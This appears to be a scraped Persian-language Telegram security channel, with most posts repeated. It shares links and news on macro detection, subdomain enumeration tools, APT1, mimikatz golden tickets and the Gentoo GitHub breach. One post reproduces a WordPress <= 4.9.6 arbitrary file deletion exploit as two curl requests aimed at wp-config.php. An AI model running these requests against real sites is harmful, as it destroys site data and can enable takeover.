شناسایی ماکروهای مخرب آفیس اجرا شده بر روی سیستم
https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/
#office
#word
#macro
#windows
#phishing
#spear_phishing
@sec_nerd
https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/
#office
#word
#macro
#windows
#phishing
#spear_phishing
@sec_nerd
آموزش تست نفوذ وب سرویس های JSON با استفاده از تکنیک fuzzing
https://secapps.com/blog/2018/03/fuzzing-json-web-services
#api
#fuzzing
#pentest
@sec_nerd
https://secapps.com/blog/2018/03/fuzzing-json-web-services
#api
#fuzzing
#pentest
@sec_nerd
مجموعه ابزارهای شناسایی ساب دامین ها
https://github.com/aboul3la/Sublist3r Sublist3r
https://github.com/jhaddix/domain enumall
https://github.com/guelfoweb/knock Knock
https://github.com/TheRook/subbrute Subbrute
https://github.com/blechschmidt/massdns massdns
https://bitbucket.org/LaNMaSteR53/recon-ng Recon-ng
https://github.com/caffix/amass Amass
#enum
#web
#pentest
#domain
@sec_nerd
https://github.com/aboul3la/Sublist3r Sublist3r
https://github.com/jhaddix/domain enumall
https://github.com/guelfoweb/knock Knock
https://github.com/TheRook/subbrute Subbrute
https://github.com/blechschmidt/massdns massdns
https://bitbucket.org/LaNMaSteR53/recon-ng Recon-ng
https://github.com/caffix/amass Amass
#enum
#web
#pentest
#domain
@sec_nerd
GitHub
GitHub - aboul3la/Sublist3r: Fast subdomains enumeration tool for penetration testers
Fast subdomains enumeration tool for penetration testers - aboul3la/Sublist3r
اگر از filezilla استفاده میکنید مراقب بدافزاری که با پوشش این برنامه،سیستم های ویندوزی را آلوده میکند باشید!
https://forum.filezilla-project.org/viewtopic.php?t=48441
#news
#malware
#filezilla
@sec_nerd
https://forum.filezilla-project.org/viewtopic.php?t=48441
#news
#malware
#filezilla
@sec_nerd
گزارش شرکت امنیتی Mandiant در خصوص ارتباط گروه هکرهای چینی با کد APT1 که جزییات جالبی از نحوه شناسایی و فعالیتهای این گروه دارد:
شرکت Mandiant به دنبال شواهدی بود که نشان دهد APT1 ارتباط نزدیکی با ارتش آزادی بخش مردم چین (بصورت خلاصه PLA) دارد. mandia مطمئن بود که این هکرها زیرمجموعه واحد 61398 ارتش چین هستند و میدانست که متهم کردن ارتش چین در این عملیات، قدم بزرگی برای شرکتش به حساب می آید. آنها شواهد زیادی از شرکتهای هک شده و شواهد حضور هکرهای apt1 جمع آوری کرده بودند اما هیچ کدام از افراد این شرکت نمیتوانستند بصورت حضوری در واحدهای مشکوک کشور چین حضور یابند،چه بصورت فیزیکی و چه مجازی، زیرا ارتش چین آنها را از این کار منع میکرد.
در نهایت پس از تلاشهای فراوان کارشناسان mandiant توانستند با آلوده کردن لپ تاپ های هکرهای چینی، دوربین های این لپ تاپها را فعال کنند!
آنها میتوانستند تایپ کردن آنها را پشت میزهای کارشان ببینند.
تمام این هکرها مرد بودند، نزدیک ۲۵ سال سن داشتند، ساعت ۸ و نیم صبح به وقت شانگهای وارد محل کار میشدند، نتایج وزرشی را بررسی میکردند، به دوست دخترهای خود ایمیل میزدند و گاهی پورن تماشا میکردند!
ساعت ۹ حملات خود را به سیستم های مختلف در اقصی نقاط جهان آغاز میکردند و این کار تا زمان ناهار ادامه داشت. زمان استراحت بعد از ناهار هم اختصاص به کارهای صبح مانند ایمیل و پورن و ... داشت.
بر خلاف تصور نویسنده،این هکرها لباسهای نظامی و آرم و علائم نداشتند بلکه با ژاکت های چرم و گاهی عرقگیر کار میکردند و مشخص نیست که آنها با سفارش دولت یا شرکتها اقدام به هک میکردند یا نه!
تصاویر مربوط به این مطالب را در پست بعدی خواهید دید.
کتاب کامل این گزارش نیز از آمازون قابل تهیه است:
https://www.amazon.com/Perfect-Weapon-Sabotage-Fear-Cyber/dp/0451497899
#apt1
#news
#china
@sec_nerd
شرکت Mandiant به دنبال شواهدی بود که نشان دهد APT1 ارتباط نزدیکی با ارتش آزادی بخش مردم چین (بصورت خلاصه PLA) دارد. mandia مطمئن بود که این هکرها زیرمجموعه واحد 61398 ارتش چین هستند و میدانست که متهم کردن ارتش چین در این عملیات، قدم بزرگی برای شرکتش به حساب می آید. آنها شواهد زیادی از شرکتهای هک شده و شواهد حضور هکرهای apt1 جمع آوری کرده بودند اما هیچ کدام از افراد این شرکت نمیتوانستند بصورت حضوری در واحدهای مشکوک کشور چین حضور یابند،چه بصورت فیزیکی و چه مجازی، زیرا ارتش چین آنها را از این کار منع میکرد.
در نهایت پس از تلاشهای فراوان کارشناسان mandiant توانستند با آلوده کردن لپ تاپ های هکرهای چینی، دوربین های این لپ تاپها را فعال کنند!
آنها میتوانستند تایپ کردن آنها را پشت میزهای کارشان ببینند.
تمام این هکرها مرد بودند، نزدیک ۲۵ سال سن داشتند، ساعت ۸ و نیم صبح به وقت شانگهای وارد محل کار میشدند، نتایج وزرشی را بررسی میکردند، به دوست دخترهای خود ایمیل میزدند و گاهی پورن تماشا میکردند!
ساعت ۹ حملات خود را به سیستم های مختلف در اقصی نقاط جهان آغاز میکردند و این کار تا زمان ناهار ادامه داشت. زمان استراحت بعد از ناهار هم اختصاص به کارهای صبح مانند ایمیل و پورن و ... داشت.
بر خلاف تصور نویسنده،این هکرها لباسهای نظامی و آرم و علائم نداشتند بلکه با ژاکت های چرم و گاهی عرقگیر کار میکردند و مشخص نیست که آنها با سفارش دولت یا شرکتها اقدام به هک میکردند یا نه!
تصاویر مربوط به این مطالب را در پست بعدی خواهید دید.
کتاب کامل این گزارش نیز از آمازون قابل تهیه است:
https://www.amazon.com/Perfect-Weapon-Sabotage-Fear-Cyber/dp/0451497899
#apt1
#news
#china
@sec_nerd
بکارگیری پاورشل توسط تیم های امنیتی با هدف مدیریت و مانیتورینگ رخدادها در ویندوز (قسمت اول)
https://blog.varonis.com/practical-powershell-for-it-security-part-i-file-event-monitoring/
#windows
#ps
#security
@sec_nerd
https://blog.varonis.com/practical-powershell-for-it-security-part-i-file-event-monitoring/
#windows
#ps
#security
@sec_nerd
domain discovery tool
subfinder
https://github.com/subfinder/subfinder
یافتن ساب دامین های وبسایتها
#enum
#sub_domain
#web
#pentest
#bug_bounty
@sec_nerd
subfinder
https://github.com/subfinder/subfinder
یافتن ساب دامین های وبسایتها
#enum
#sub_domain
#web
#pentest
#bug_bounty
@sec_nerd
GitHub
GitHub - projectdiscovery/subfinder: Fast passive subdomain enumeration tool.
Fast passive subdomain enumeration tool. Contribute to projectdiscovery/subfinder development by creating an account on GitHub.
بر اساس گزارش شرکت Big Brother Watch که یک شرکت طرفدار حفظ حریم خصوصی و آزادی های مدنی در بریتانیاست، سیستم صوتی درآمد و گمرکات ملکه صداهای بیش از 5.1 میلیون شهروند بریتانیا را بدون اطلاع آنها ضبط کرده است.
این سیستم صوتی که از ژانویه سال قبل راه اندازی شده است برای تشخیص هویت افرادی که با این آژانس تماس میگیرند، استفاده میشود.
این سیستم در حال ایجاد یک دیتابیس تشخیص صدای بیومتریک برای حکومت است.
این کار مخالف بند ۹ قانون GDPR نیز به حساب می آید.
منبع:
https://www.hackread.com/voices-records-of-brits-stored-by-tax-agency/
#news
#britania
#privacy
#england
@sec_nerd
این سیستم صوتی که از ژانویه سال قبل راه اندازی شده است برای تشخیص هویت افرادی که با این آژانس تماس میگیرند، استفاده میشود.
این سیستم در حال ایجاد یک دیتابیس تشخیص صدای بیومتریک برای حکومت است.
این کار مخالف بند ۹ قانون GDPR نیز به حساب می آید.
منبع:
https://www.hackread.com/voices-records-of-brits-stored-by-tax-agency/
#news
#britania
#privacy
#england
@sec_nerd
HackRead
Voice records of millions of Brits stored by tax agency without consent
According to Big Brother Watch, HMRC (Her Majesty's Revenue and Customs) has stored voice records of over 5.1 million British citizens.
مروری بر تیکت طلایی در mimikatz
https://www.beneaththewaves.net/Projects/Mimikatz_20_-_Golden_Ticket_Walkthrough.html
#mimikatz
#windows
#privesc
#golden_ticket
#network
@sec_nerd
https://www.beneaththewaves.net/Projects/Mimikatz_20_-_Golden_Ticket_Walkthrough.html
#mimikatz
#windows
#privesc
#golden_ticket
#network
@sec_nerd
www.beneaththewaves.net
Mimikatz 2.0 - Golden Ticket Walkthrough - Projects - Beneath the Waves
A step-by-step example of using the Kerberos
❌ قابل توجه کاربران سیستم عامل Gentoo❌
روز گذشته حساب گیت هاب سیستم عامل Gentoo توسط هکر یا هکرها مورد حمله قرار گرفت و سورس کد اصلی با سورس کد آلوده جایگزین شد!
این هکرها که ماهیت شان شناخته شده نیست در روز ۲۸ ژوئن موفق به دستیابی به حساب گیت هاب این سیستم عامل شدند.
منبع:
https://thehackernews.com/2018/06/gentoo-linux-github.html
#news
#linux
#github
#gentoo
#malware
@sec_nerd
روز گذشته حساب گیت هاب سیستم عامل Gentoo توسط هکر یا هکرها مورد حمله قرار گرفت و سورس کد اصلی با سورس کد آلوده جایگزین شد!
این هکرها که ماهیت شان شناخته شده نیست در روز ۲۸ ژوئن موفق به دستیابی به حساب گیت هاب این سیستم عامل شدند.
منبع:
https://thehackernews.com/2018/06/gentoo-linux-github.html
#news
#linux
#github
#gentoo
#malware
@sec_nerd
اکسپلویت جدید وردپرس که قابلیت حذف هر فایل دلخواه را به هکرها میدهد!
# Exploit Title: Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability
# Date: 2018-06-27
# Exploit Author: VulnSpy
# Vendor Homepage: https://www.wordpress.org
# Software Link: https://www.wordpress.org/download
# Version: <= 4.9.6
# Tested on: php7 mysql5
# CVE :
Step 1:
#wordpress
#wp
#exploit
#web
#pentest
@sec_nerd
# Exploit Title: Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability
# Date: 2018-06-27
# Exploit Author: VulnSpy
# Vendor Homepage: https://www.wordpress.org
# Software Link: https://www.wordpress.org/download
# Version: <= 4.9.6
# Tested on: php7 mysql5
# CVE :
Step 1:
curl -v 'https://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'Step 2:
curl -v 'https://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***'
#wordpress
#wp
#exploit
#web
#pentest
@sec_nerd
WordPress.org
Download
Download WordPress today, and get started on creating your website with one of the most powerful, popular, and customizable platforms in the world.
امنیت اطلاعات
اکسپلویت جدید وردپرس که قابلیت حذف هر فایل دلخواه را به هکرها میدهد! # Exploit Title: Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability # Date: 2018-06-27 # Exploit Author: VulnSpy # Vendor Homepage: https://www.wordpress.org # Software Link: http:…
This media is not supported in your browser
VIEW IN TELEGRAM
لیست ۵۰۰ سوپر کامپیوتر جهان منتشر شد و رتبه اول قوی ترین سوپر کامپیوتر به IBM Summit از امریکا اختصاص یافت.
در این رده بندی امریکا اول است اما سوپرکامپیوترهای چینی تعداد بیشتری دارند.
پس از سالها، توجه رده بندی ها از CPU به سوی GPU کشیده شده است و در این زمینه NVidia مجالی به رقبای خود برای خودنمایی نداده است.
نکته جالب توجه، استفاده تمامی این سوپرکامپیوترها از سیستم عامل لینوکس است! (همانند سالهای پیش)
منبع:
https://fossbytes.com/top500-most-powerful-supercomputer-list-2018-powered-by-linux/
#AI
#ML
#news
#linux
#gpu
#IBM
#usa
#chinna
@sec_nerd
در این رده بندی امریکا اول است اما سوپرکامپیوترهای چینی تعداد بیشتری دارند.
پس از سالها، توجه رده بندی ها از CPU به سوی GPU کشیده شده است و در این زمینه NVidia مجالی به رقبای خود برای خودنمایی نداده است.
نکته جالب توجه، استفاده تمامی این سوپرکامپیوترها از سیستم عامل لینوکس است! (همانند سالهای پیش)
منبع:
https://fossbytes.com/top500-most-powerful-supercomputer-list-2018-powered-by-linux/
#AI
#ML
#news
#linux
#gpu
#IBM
#usa
#chinna
@sec_nerd
Fossbytes
Linux Powers ALL TOP500 Supercomputers In The World | US Beats China For #1
IBM Summit has tasted another bread of success as the TOP500 List of the world's fastest supercomputers renews for the year 2018. It's not surprising to see Summit ( with its Linpack score of 122.3 petaflops) taking the throne away from Sunway TaihuLight…